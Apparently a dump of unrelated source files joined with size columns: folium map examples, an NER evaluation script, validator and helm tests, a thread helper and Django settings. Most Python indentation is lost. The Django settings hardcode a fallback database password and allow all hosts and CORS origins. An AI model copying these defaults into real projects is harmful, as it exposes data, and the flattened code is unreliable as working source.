for i in self.TESTS['Basics']:
assert hex_spiral(*i['input']) == i['answer']
def test_Extra(self):
for i in self.TESTS['Extra']:
assert hex_spiral(*i['input']) == i['answer']
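# Standard unittest entry point so these tests can also be run directly.
if __name__ == "__main__":
    unittest.main()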
| 2,213 | 901 |
__author__ = "jacksonsr45@gmail.com"
new_init_map = {
'knight': {
'pos_x': {
},
'pos_y': {
},
},
'paladin': {
'pos_x': {
},
'pos_y': {
},
},
'mage': {
'pos_x': {
},
'pos_y': {
},
},
'ranger': {
'pos_x': {
},
'pos_y': {
},
},
} | 394 | 163 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Tencent map examples
from __future__ import print_function
import random
import folium
from folium.features import DivIcon
from folium.plugins import MarkerCluster, RotatedMarker, PolyLineTextPath, DirectedLine
def tencent_marker(out_dir="../../out"):
"""
    Tencent map: place markers
:param out_dir:
:return:
"""
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12)
folium.Marker(location=[31.35742, 120.94784], icon=folium.Icon(color='blue', icon='ok-sign')
).add_to(map_osm)
folium.Marker(location=[31.32, 120.63], icon=folium.Icon(color='red', icon='info-sign')
).add_to(map_osm)
file_path = "{}/tencent_roadmap.html".format(out_dir)
map_osm.save(file_path)
def tencent_polyline(out_dir="../../out"):
    """Tencent map: polygon / polyline"""
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12)
locs = [[31.387113, 120.929393], [31.364861, 120.609265], [31.226864, 120.511118],
[31.269273, 120.750024], [31.264751, 120.598769], [31.299345, 120.742185],
]
for loc in locs:
folium.Marker(loc).add_to(map_osm)
folium.PolyLine(
locs,
fill_color='high',
fill=True,
fill_opacity=0.6,
stroke=False).add_to(map_osm)
file_path = "{}/tencent_polyline.html".format(out_dir)
map_osm.save(file_path)
def tencent_marker_with_number(out_dir="../../out"):
    """Tencent map: markers labelled with numbers"""
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12, subdomains="012")
locs = [[31.387113, 120.929393], [31.364861, 120.609265], [31.226864, 120.511118],
[31.269273, 120.750024], [31.264751, 120.598769], [31.299345, 120.742185],
]
for loc in locs:
value = random.randint(0, 100)
        # text label
folium.Marker(loc,
icon=DivIcon(icon_size=(150, 36),
icon_anchor=(7, 20),
html='<div style="font-size: 18pt; color : black">{}</div>'.format(value),
)
).add_to(map_osm)
        # circle
map_osm.add_child(folium.CircleMarker(loc, radius=20))
file_path = "{}/tencent_marker_with_number.html".format(out_dir)
map_osm.save(file_path)
def tencent_marker_cluster(out_dir="../../out"):
    """Tencent map: marker cluster"""
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12, subdomains="012")
locs = [[31.387113, 120.929393], [31.364861, 120.609265], [31.226864, 120.511118],
[31.269273, 120.750024], [31.264751, 120.598769], [31.299345, 120.742185],
]
marker_cluster = MarkerCluster().add_to(map_osm)
for loc in locs:
folium.Marker(loc,
popup='Add popup text here.',
).add_to(marker_cluster)
file_path = "{}/tencent_marker_cluster.html".format(out_dir)
map_osm.save(file_path)
def gaode_arrow(out_dir="../../out"):
"""
    Gaode (AMap) map: arrow marker
:param out_dir:
:return:
"""
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12, tiles="Gaode")
folium.RegularPolygonMarker(location=(31.25, 120.742185), fill_color='red', number_of_sides=3, radius=10,
rotation=0).add_to(map_osm)
file_path = "{}/gaode_arrow.html".format(out_dir)
map_osm.save(file_path)
return
def tencent_hexagon_with_number(out_dir="../../out"):
    """Tencent map: hexagon cluster with numbers"""
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12, subdomains="012")
locs = [[31.387113, 120.929393], [31.364861, 120.609265], [31.226864, 120.511118],
[31.269273, 120.750024], [31.264751, 120.598769], [31.299345, 120.742185],
]
marker_cluster = MarkerCluster().add_to(map_osm)
for loc in locs:
folium.Marker(loc,
popup='Add popup text here.',
).add_to(marker_cluster)
file_path = "{}/tencent_hexagon_with_number.html".format(out_dir)
map_osm.save(file_path)
def tencent_hello(out_dir="../../out"):
    """Tencent map: basic markers and a polyline (hello example)"""
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12)
locs = [[31.387113, 120.929393], [31.364861, 120.609265], [31.226864, 120.511118],
[31.269273, 120.750024], [31.264751, 120.598769], [31.299345, 120.742185],
]
for loc in locs:
folium.Marker(loc).add_to(map_osm)
folium.PolyLine(
locs,
fill_color='high',
fill=True,
fill_opacity=0.6,
stroke=False).add_to(map_osm)
file_path = "{}/tencent_hello.html".format(out_dir)
map_osm.save(file_path)
def tencent_rotated_marker(out_dir="../../out"):
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12)
locs = [[31.387113, 120.929393], [31.364861, 120.609265], [31.226864, 120.511118],
[31.269273, 120.750024], [31.264751, 120.598769], [31.299345, 120.742185],
]
for loc in locs:
RotatedMarker(loc, rotation_angle=45
).add_to(map_osm)
folium.PolyLine(
locs,
fill_color='high',
fill=True,
fill_opacity=0.6,
stroke=False).add_to(map_osm)
file_path = "{}/tencent_rotated_marker.html".format(out_dir)
map_osm.save(file_path)
def tencent_directed_line(out_dir="../../out"):
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12)
lines = [
([31.387113, 120.929393], [31.364861, 120.609265]),
([31.269273, 120.750024], [31.226864, 120.511118]),
]
for line in lines:
# _line = folium.PolyLine(
# line,
# weight=10,
# color='#8EE9FF'
# ).add_to(map_osm)
# # attr = {'fill': 'red'}
# attr = {'font-weight': 'bold', 'font-size': '24', 'fill': 'red'}
#
# PolyLineTextPath(_line,
# #text='\u25BA', # 三角形
# #text='\u2708', # 飞机
# text='►',
# repeat=False,
# offset=6,
# center=True,
# orientation=0,
# attributes=attr
# ).add_to(map_osm)
#
_line = DirectedLine(
src=line[0],
dst=line[1],
weight=10,
color='#8EE9FF'
).add_to(map_osm)
# _line = DirectedLine(
# src=lines[0][0],
# dst=lines[0][1],
# weight=10,
# #color='#8EE9FF'
# color='black'
# ).add_to(map_osm)
file_path = "{}/tencent_directed_line.html".format(out_dir)
map_osm.save(file_path)
if __name__ == "__main__":
print()
tencent_marker()
tencent_polyline()
tencent_marker_with_number()
tencent_marker_cluster()
tencent_hexagon_with_number()
gaode_arrow()
tencent_hello()
tencent_rotated_marker()
tencent_directed_line()
| 6,995 | 3,276 |
from random import choices
import explainaboard.error_analysis as ea
import numpy
import pickle
import codecs
import os
def read_data(corpus_type, fn, column_no=-1, delimiter=' '):
print('corpus_type', corpus_type)
word_sequences = list()
tag_sequences = list()
total_word_sequences = list()
total_tag_sequences = list()
with codecs.open(fn, 'r', 'utf-8') as f:
lines = f.readlines()
curr_words = list()
curr_tags = list()
for k in range(len(lines)):
line = lines[k].strip()
if len(line) == 0 or line.startswith('-DOCSTART-'): # new sentence or new document
if len(curr_words) > 0:
word_sequences.append(curr_words)
tag_sequences.append(curr_tags)
curr_words = list()
curr_tags = list()
continue
strings = line.split(delimiter)
word = strings[0].strip()
            tag = strings[column_no].strip()  # by default, we take the last tag
# tag='B-'+tag
tag = tag + "-W"
curr_words.append(word)
curr_tags.append(tag)
total_word_sequences.append(word)
total_tag_sequences.append(tag)
if k == len(lines) - 1:
word_sequences.append(curr_words)
tag_sequences.append(curr_tags)
# if verbose:
# print('Loading from %s: %d samples, %d words.' % (fn, len(word_sequences), get_words_num(word_sequences)))
# return word_sequences, tag_sequences
return total_word_sequences, total_tag_sequences, word_sequences, tag_sequences
def get_aspect_value(test_word_sequences, test_true_tag_sequences, test_word_sequences_sent,
test_true_tag_sequences_sent, dict_precomputed_path, dict_aspect_func):
def get_sentential_value(test_true_tag_sequences_sent, test_word_sequences_sent):
eDen = []
sentLen = []
for i, test_sent in enumerate(test_true_tag_sequences_sent):
pred_chunks = set(ea.get_chunks(test_sent))
num_entityToken = 0
for pred_chunk in pred_chunks:
idx_start = pred_chunk[1]
idx_end = pred_chunk[2]
num_entityToken += idx_end - idx_start
# introduce the entity token density in sentence ...
eDen.append(float(num_entityToken) / len(test_sent))
# introduce the sentence length in sentence ...
sentLen.append(len(test_sent))
return eDen, sentLen
dict_precomputed_model = {}
for aspect, path in dict_precomputed_path.items():
print("path:\t" + path)
if ea.os.path.exists(path):
print('load the hard dictionary of entity span in test set...')
fread = open(path, 'rb')
dict_precomputed_model[aspect] = pickle.load(fread)
else:
raise ValueError("can not load hard dictionary" + aspect + "\t" + path)
dict_span2aspect_val = {}
for aspect, fun in dict_aspect_func.items():
dict_span2aspect_val[aspect] = {}
eDen_list, sentLen_list = get_sentential_value(test_true_tag_sequences_sent,
test_word_sequences_sent)
dict_pos2sid = ea.get_pos2sentid(test_word_sequences_sent)
dict_ap2rp = ea.get_token_position(test_word_sequences_sent)
all_chunks = ea.get_chunks(test_true_tag_sequences)
dict_span2sid = {}
dict_chunkid2span = {}
for span_info in all_chunks:
# print(span_info)
# span_type = span_info[0].lower()
# print(span_type)
idx_start = span_info[1]
idx_end = span_info[2]
span_cnt = ''.join(test_word_sequences[idx_start:idx_end]).lower()
# print(span_cnt.encode("utf-8").decode("utf-8"))
span_cnt = span_cnt.encode("gbk", "ignore").decode("gbk", "ignore")
# print(sys.getdefaultencoding())
span_type = ''.join(test_true_tag_sequences[idx_start:idx_end])
span_pos = str(idx_start) + "|||" + str(idx_end) + "|||" + span_type
if len(span_type) != (idx_end - idx_start):
print(idx_start, idx_end)
print(span_info)
print(span_type + "\t" + span_cnt)
print("--------------")
# print(span_pos)
# print(span_info)
# print(span_cnt)
span_length = idx_end - idx_start
# span_token_list = test_word_sequences[idx_start:idx_end]
# span_token_pos_list = [str(pos) + "|||" + span_type for pos in range(idx_start, idx_end)]
# print(span_token_pos_list)
span_sentid = dict_pos2sid[idx_start]
sLen = float(sentLen_list[span_sentid])
dict_span2sid[span_pos] = span_sentid
text_sample = "".join(test_word_sequences_sent[span_sentid])
text_sample = text_sample
dict_chunkid2span[span_pos] = span_cnt + "|||" + text_sample
# Sentence Length: sLen
aspect = "sLen"
if aspect in dict_aspect_func.keys():
dict_span2aspect_val[aspect][span_pos] = sLen
# Entity Length: eLen
aspect = "eLen"
if aspect in dict_aspect_func.keys():
dict_span2aspect_val[aspect][span_pos] = float(span_length)
# Tag: tag
aspect = "tag"
if aspect in dict_aspect_func.keys():
dict_span2aspect_val[aspect][span_pos] = span_type
# print(dict_span2aspect_val)
return dict_span2aspect_val, dict_span2sid, dict_chunkid2span
def evaluate(task_type="ner", analysis_type="single", systems=[], dataset_name = 'dataset_name', model_name = 'model_name', output_filename="./output.json", is_print_ci=False,
is_print_case=False, is_print_ece=False):
path_text = systems[0] if analysis_type == "single" else ""
path_comb_output = "model_name" + "/" + path_text.split("/")[-1]
dict_aspect_func, dict_precomputed_path, obj_json = ea.load_task_conf(task_dir=os.path.dirname(__file__))
list_text_sent, list_text_token = ea.read_single_column(path_text, 0)
list_true_tags_sent, list_true_tags_token = ea.read_single_column(path_text, 1)
list_pred_tags_sent, list_pred_tags_token = ea.read_single_column(path_text, 2)
dict_span2aspect_val, dict_span2sid, dict_chunkid2span = get_aspect_value(list_text_token, list_true_tags_token,
list_text_sent, list_true_tags_sent,
dict_precomputed_path, dict_aspect_func)
dict_span2aspect_val_pred, dict_span2sid_pred, dict_chunkid2span_pred = get_aspect_value(list_text_token,
list_pred_tags_token,
list_text_sent,
list_pred_tags_sent,
dict_precomputed_path,
dict_aspect_func)
holistic_performance = ea.f1(list_true_tags_sent, list_pred_tags_sent)["f1"]
confidence_low_overall, confidence_up_overall = 0, 0
if is_print_ci:
confidence_low_overall, confidence_up_overall = compute_confidence_interval_f1(dict_span2sid.keys(),
dict_span2sid_pred.keys(),
dict_span2sid,
dict_span2sid_pred,
n_times=10)
print("confidence_low_overall:\t", confidence_low_overall)
print("confidence_up_overall:\t", confidence_up_overall)
print("------------------ Holistic Result")
print(holistic_performance)
# print(f1(list_true_tags_token, list_pred_tags_token)["f1"])
dict_bucket2span = {}
dict_bucket2span_pred = {}
dict_bucket2f1 = {}
aspect_names = []
error_case_list = []
for aspect, func in dict_aspect_func.items():
# print(aspect, dict_span2aspect_val[aspect])
dict_bucket2span[aspect] = ea.select_bucketing_func(func[0], func[1], dict_span2aspect_val[aspect])
# print(aspect, dict_bucket2span[aspect])
# exit()
dict_bucket2span_pred[aspect] = ea.bucket_attribute_specified_bucket_interval(dict_span2aspect_val_pred[aspect],
dict_bucket2span[aspect].keys())
dict_bucket2f1[aspect], error_case_list = get_bucket_f1(dict_bucket2span[aspect],
dict_bucket2span_pred[aspect], dict_span2sid,
dict_span2sid_pred, dict_chunkid2span,
dict_chunkid2span_pred, list_true_tags_token,
list_pred_tags_token, is_print_ci, is_print_case)
aspect_names.append(aspect)
print("aspect_names: ", aspect_names)
# for v in error_case_list:
# print(v)
print("------------------ Breakdown Performance")
for aspect in dict_aspect_func.keys():
ea.print_dict(dict_bucket2f1[aspect], aspect)
print("")
# Calculate databias w.r.t numeric attributes
dict_aspect2bias = {}
for aspect, aspect2Val in dict_span2aspect_val.items():
if type(list(aspect2Val.values())[0]) != type("string"):
dict_aspect2bias[aspect] = numpy.average(list(aspect2Val.values()))
print("------------------ Dataset Bias")
for k, v in dict_aspect2bias.items():
print(k + ":\t" + str(v))
print("")
dict_fine_grained = {}
for aspect, metadata in dict_bucket2f1.items():
dict_fine_grained[aspect] = []
for bucket_name, v in metadata.items():
# print("---------debug--bucket name old---")
# print(bucket_name)
bucket_name = ea.beautify_interval(bucket_name)
# print("---------debug--bucket name new---")
# print(bucket_name)
# bucket_value = format(v[0]*100,'.4g')
bucket_value = format(float(v[0]) * 100, '.4g')
n_sample = v[1]
confidence_low = format(float(v[2]) * 100, '.4g')
confidence_up = format(float(v[3]) * 100, '.4g')
error_entity_list = v[4]
# instantiation
dict_fine_grained[aspect].append({"bucket_name": bucket_name, "bucket_value": bucket_value, "num": n_sample,
"confidence_low": confidence_low, "confidence_up": confidence_up,
"bucket_error_case": error_entity_list[
0:int(len(error_entity_list) / 10)]})
obj_json["task"] = task_type
obj_json["data"]["name"] = dataset_name
obj_json["data"]["language"] = "Chinese"
obj_json["data"]["bias"] = dict_aspect2bias
obj_json["model"]["name"] = model_name
obj_json["model"]["results"]["overall"]["performance"] = holistic_performance
obj_json["model"]["results"]["overall"]["confidence_low"] = confidence_low_overall
obj_json["model"]["results"]["overall"]["confidence_up"] = confidence_up_overall
obj_json["model"]["results"]["fine_grained"] = dict_fine_grained
# Save error cases: overall
obj_json["model"]["results"]["overall"]["error_case"] = error_case_list[0:int(len(error_case_list) / 10)]
ea.save_json(obj_json, output_filename)
def compute_confidence_interval_f1(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred, n_times=1000):
n_data = len(dict_span2sid)
sample_rate = ea.get_sample_rate(n_data)
n_sampling = int(n_data * sample_rate)
print("sample_rate:\t", sample_rate)
print("n_sampling:\t", n_sampling)
dict_sid2span_salient = {}
for span in spans_true:
# print(span)
if len(span.split("|||")) != 3:
break
sid = dict_span2sid[span]
if sid in dict_sid2span_salient.keys():
dict_sid2span_salient[sid].append(span)
else:
dict_sid2span_salient[sid] = [span]
dict_sid2span_salient_pred = {}
for span in spans_pred:
sid = dict_span2sid_pred[span]
if sid in dict_sid2span_salient_pred.keys():
dict_sid2span_salient_pred[sid].append(span)
else:
dict_sid2span_salient_pred[sid] = [span]
performance_list = []
confidence_low, confidence_up = 0, 0
for i in range(n_times):
sample_index_list = choices(range(n_data), k=n_sampling)
true_label_bootstrap_list = []
pred_label_bootstrap_list = []
for ind, sid in enumerate(sample_index_list):
if sid in dict_sid2span_salient.keys():
true_label_list = dict_sid2span_salient[sid]
true_label_list_revised = [true_label + "|||" + str(ind) for true_label in true_label_list]
true_label_bootstrap_list += true_label_list_revised
if sid in dict_sid2span_salient_pred.keys():
pred_label_list = dict_sid2span_salient_pred[sid]
pred_label_list_revised = [pred_label + "|||" + str(ind) for pred_label in pred_label_list]
pred_label_bootstrap_list += pred_label_list_revised
f1, p, r = ea.evaluate_chunk_level(pred_label_bootstrap_list, true_label_bootstrap_list)
performance_list.append(f1)
if n_times != 1000:
confidence_low, confidence_up = ea.mean_confidence_interval(performance_list)
else:
performance_list.sort()
confidence_low = performance_list[24]
confidence_up = performance_list[974]
# print("\n")
# print("confidence_low:\t", confidence_low)
# print("confidence_up:\t", confidence_up)
return confidence_low, confidence_up
def get_error_case_segmentation(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2span_sent, dict_chunkid2span_sent_pred,
list_true_tags_token, list_pred_tags_token):
error_case_list = []
for pos, tag in dict_pos2tag.items():
true_label = tag
pred_label = ""
# print(dict_chunkid2span_sent.keys())
if pos + "|||" + tag not in dict_chunkid2span_sent.keys():
continue
span_sentence = dict_chunkid2span_sent[pos + "|||" + tag]
if pos in dict_pos2tag_pred.keys():
pred_label = dict_pos2tag_pred[pos]
if true_label == pred_label:
continue
# print(pos + "\t" + true_label + "\t" + pred_label)
else:
start = int(pos.split("|||")[0])
end = int(pos.split("|||")[1])
pred_label = "".join(list_pred_tags_token[start:end])
# print(pred_label)
error_case = span_sentence + "|||" + true_label + "|||" + pred_label
error_case_list.append(error_case)
for pos, tag in dict_pos2tag_pred.items():
true_label = ""
pred_label = tag
if pos + "|||" + tag not in dict_chunkid2span_sent_pred.keys():
continue
span_sentence = dict_chunkid2span_sent_pred[pos + "|||" + tag]
if pos in dict_pos2tag.keys():
true_label = dict_pos2tag[pos]
if true_label == pred_label:
continue
else:
start = int(pos.split("|||")[0])
end = int(pos.split("|||")[1])
true_label = "".join(list_true_tags_token[start:end])
error_case = span_sentence + "|||" + true_label + "|||" + pred_label
error_case_list.append(error_case)
# for v in error_case_list:
# print(len(error_case_list))
# print(v)
# print(error_case_list)
return error_case_list
def get_bucket_f1(dict_bucket2span, dict_bucket2span_pred, dict_span2sid, dict_span2sid_pred, dict_chunkid2span,
dict_chunkid2span_pred, list_true_tags_token, list_pred_tags_token, is_print_ci, is_print_case):
dict_bucket2f1 = {}
# predict: 2_3 -> NER
dict_pos2tag_pred = {}
if is_print_case:
for k_bucket_eval, spans_pred in dict_bucket2span_pred.items():
for span_pred in spans_pred:
pos_pred = "|||".join(span_pred.split("|||")[0:2])
tag_pred = span_pred.split("|||")[-1]
dict_pos2tag_pred[pos_pred] = tag_pred
# true: 2_3 -> NER
dict_pos2tag = {}
if is_print_case:
for k_bucket_eval, spans in dict_bucket2span.items():
for span in spans:
pos = "|||".join(span.split("|||")[0:2])
tag = span.split("|||")[-1]
dict_pos2tag[pos] = tag
error_case_list = []
if is_print_case:
error_case_list = get_error_case_segmentation(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2span,
dict_chunkid2span_pred, list_true_tags_token,
list_pred_tags_token)
# print(len(error_case_list))
# print(error_case_list)
for bucket_interval, spans_true in dict_bucket2span.items():
spans_pred = []
if bucket_interval not in dict_bucket2span_pred.keys():
raise ValueError("Predict Label Bucketing Errors")
else:
spans_pred = dict_bucket2span_pred[bucket_interval]
confidence_low, confidence_up = 0, 0
if is_print_ci:
confidence_low, confidence_up = compute_confidence_interval_f1(spans_true, spans_pred, dict_span2sid,
dict_span2sid_pred)
confidence_low = format(confidence_low, '.3g')
confidence_up = format(confidence_up, '.3g')
f1, p, r = ea.evaluate_chunk_level(spans_pred, spans_true)
error_entity_list = []
if is_print_case:
for span_true in spans_true:
if span_true not in spans_pred:
# print(span_true)
pos_true = "|||".join(span_true.split("|||")[0:2])
tag_true = span_true.split("|||")[-1]
if pos_true in dict_pos2tag_pred.keys():
tag_pred = dict_pos2tag_pred[pos_true]
if tag_pred != tag_true:
error_entity_list.append(
dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + dict_pos2tag_pred[pos_true])
# print(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + dict_pos2tag_pred[pos_true])
else:
start = int(pos_true.split("|||")[0])
end = int(pos_true.split("|||")[1])
pred_label = "".join(list_pred_tags_token[start:end])
error_entity_list.append(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + pred_label)
# print(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + pred_label)
dict_bucket2f1[bucket_interval] = [f1, len(spans_true), confidence_low, confidence_up, error_entity_list]
# if bucket_interval[0] == 1.0:
# print("debug-f1:",f1)
# print(spans_pred[0:20])
# print(spans_true[0:20])
# print("dict_bucket2f1: ",dict_bucket2f1)
return ea.sort_dict(dict_bucket2f1), error_case_list | 19,804 | 6,397 |
import os
from pathlib import Path
from unittest import TestCase
import validator.validator as validator
from .test_utils import schema, build_map
class TestDefault(TestCase):
old_cwd = os.getcwd()
@classmethod
def setUpClass(cls):
os.chdir('./tests/workspaces/default')
@classmethod
def tearDownClass(cls):
os.chdir(cls.old_cwd)
def test_doubleQuotation(self):
(status, successful, failed, ignored) = validator.validate_cwd(
'"failing/failing-validation.version"', schema, build_map)
self.assertEqual(status, 0)
def test_invalidWorkspace_recursive(self):
(status, successful, failed, ignored) = validator.validate_cwd('', schema, build_map)
self.assertEqual(status, 1)
def test_exclusionWildcard(self):
(status, successful, failed, ignored) = validator.validate_cwd('failing/*.version', schema, build_map)
self.assertEqual(status, 0)
self.assertSetEqual(successful, {Path('default.version'), Path('recursiveness/recursive.version'),
Path('recursiveness/recursiveness2/recursive2.version')})
self.assertSetEqual(ignored, {Path('failing/failing-validation.version')})
self.assertEqual(failed, set())
def test_excludeAll(self):
(status, successful, failed, ignored) = validator.validate_cwd('["./**/*"]', schema, build_map)
self.assertEqual(status, 0)
self.assertSetEqual(successful, set())
self.assertSetEqual(ignored, {Path('default.version'),
Path('failing/failing-validation.version'),
Path('recursiveness/recursive.version'),
Path('recursiveness/recursiveness2/recursive2.version')})
self.assertEqual(failed, set())
def test_recursiveExclusion(self):
(status, successful, failed, ignored) = validator.validate_cwd('["./recursiveness/**/*"]',
schema, build_map)
self.assertEqual(status, 1)
self.assertSetEqual(successful, {Path('default.version')})
self.assertSetEqual(ignored, {Path('recursiveness/recursive.version'),
Path('recursiveness/recursiveness2/recursive2.version')})
self.assertEqual(failed, {Path('failing/failing-validation.version')})
def test_multipleExclusions(self):
(status, successful, failed, ignored) = validator.validate_cwd('["./*.version", "./failing/*"]',
schema, build_map)
self.assertEqual(status, 0)
self.assertSetEqual(successful, {Path('recursiveness/recursive.version'),
Path('recursiveness/recursiveness2/recursive2.version')})
self.assertSetEqual(ignored, {Path('default.version'), Path('failing/failing-validation.version')})
self.assertEqual(failed, set())
| 3,045 | 849 |
import threading
import sys
import time
class WaitingThread(threading.Thread):
def __init__(self, lp, waitTime = 5):
threading.Thread.__init__(self)
self.running = True
self.waitCondition = threading.Condition(threading.RLock())
self.waitTime = waitTime
self.lastTime = None
def setWaitTime(self, time):
self.waitCondition.acquire()
self.waitTime = time
self.waitCondition.release()
def isRunning(self):
self.waitCondition.acquire()
isRunningNow = self.running
self.waitCondition.release()
return isRunningNow
def stop(self):
self.waitCondition.acquire()
self.running = False
self.waitCondition.notify()
self.waitCondition.release()
def run(self):
now = time.time()
self.lastTime = now
self.doWork(now)
while self.isRunning():
self.onstep()
now = time.time()
timeToWait = (self.lastTime + self.waitTime) - now
if(timeToWait <= 0):
self.doWork(now)
else:
print("Sleep: ", timeToWait," seconds")
self.waitCondition.acquire()
self.waitCondition.wait(timeToWait)
self.waitCondition.release()
def doWork(self, now):
deltaTime = now - self.lastTime
self.execute(deltaTime)
self.lastTime = now
def getLastTime(self):
return self.lastTime
def execute(self, deltaTime):
pass
def onstep(self):
pass
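# --- Usage sketch (illustrative only; the subclass, its body and the timings
# below are hypothetical, not part of this module). A caller overrides
# execute() with the periodic work; stop() wakes the sleeping thread at once:
#
#   class Printer(WaitingThread):
#       def execute(self, deltaTime):
#           print("tick after", deltaTime, "seconds")
#
#   p = Printer(None, waitTime=2)   # first positional arg `lp` is unused here
#   p.start()
#   ...
#   p.stop()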
| 1,586 | 449 |
import pytest
from helpers.utils import cleanup_k8s, helm_install, wait_for_pods_to_be_ready
HELM_INSTALL_CMD = """
helm upgrade \
--install \
-f ../../ci/values/kubetest/test_posthog_hpa_enabled.yaml \
--timeout 30m \
--create-namespace \
--namespace posthog \
posthog ../../charts/posthog \
--wait-for-jobs \
--wait
"""
def test_helm_install(kube):
cleanup_k8s()
helm_install(HELM_INSTALL_CMD)
wait_for_pods_to_be_ready(kube)
| 476 | 198 |
"""
Django settings for dental project.
Generated by 'django-admin startproject' using Django 2.0.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
import datetime
import logging
import logging.config
# from django.utils.log import DEFAULT_LOGGING
# Disable Django's logging setup
LOGGING_CONFIG = None
# CELERY_BROKER_URL = 'redis://redis:6379'
# CELERY_RESULT_BACKEND = 'redis://redis:6379'
# CELERY_ACCEPT_CONTENT = ['application/json']
# CELERY_TASK_SERIALIZER = 'json'
# CELERY_RESULT_SERIALIZER = 'json'
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = os.environ.get('DEBUG', 'False').lower() in ('true', '1')  # env values are strings
ALLOWED_HOSTS = ['*']
AUTH_USER_MODEL = 'userapp.User'
# Application definition
INTERNAL_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'debug_toolbar',
'django_extensions',
'corsheaders',
'django_filters',
'nepali',
'import_export',
]
# All apps developed at AmejPay go here
DEV_APPS = [
"addressapp",
"userapp",
"patientapp",
"encounterapp",
"treatmentapp",
]
INSTALLED_APPS = INTERNAL_APPS + THIRD_PARTY_APPS + DEV_APPS
MIDDLEWARE = [
# 'django.middleware.cache.UpdateCacheMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
# 'django.middleware.cache.FetchFromCacheMiddleware',
]
ROOT_URLCONF = 'dental.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'dental.wsgi.application'
# api integrantion
CORS_ORIGIN_ALLOW_ALL = True
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
DATABASES = {
'default': {
'ENGINE': os.environ.get(
'DATABASE_ENGINE', 'django.db.backends.mysql'
),
'NAME': os.environ.get('DATABASE_NAME', 'abhiyantrik_db'),
'USER': os.environ.get('DATABASE_USER', 'abhiyantrik'),
'HOST': os.environ.get('DATABASE_HOST', 'db'),
'PORT': os.environ.get('DATABASE_PORT', 3306),
'PASSWORD': os.environ.get(
'DATABASE_PASSWORD', 'abhiyantrik123'
),
}
}
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://redis:6379/0",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
}
}
}
SESSION_ENGINE = "django.contrib.sessions.backends.cache"
SESSION_CACHE_ALIAS = "default"
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Katmandu'
USE_I18N = True
USE_L10N = True
USE_TZ = True
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
# 'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework_jwt.authentication.JSONWebTokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.BasicAuthentication',
),
}
JWT_AUTH = {
# how long the original token is valid for
'JWT_EXPIRATION_DELTA': datetime.timedelta(days=180),
# allow refreshing of tokens
'JWT_ALLOW_REFRESH': True,
'JWT_REFRESH_EXPIRATION_DELTA': datetime.timedelta(days=360),
# this is the maximum time AFTER the token was issued that
    # it can be refreshed. expired tokens can't be refreshed.
}
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
DOCS_URL = '/docs/'
STATIC_ROOT = os.path.join((BASE_DIR), "static", "static")
STATICFILES_DIRS = [
os.path.join((BASE_DIR), "static"),
]
MEDIA_ROOT = os.path.join((BASE_DIR), "media")
DOCS_ROOT = os.path.join((BASE_DIR), "docs", "_build", "html")
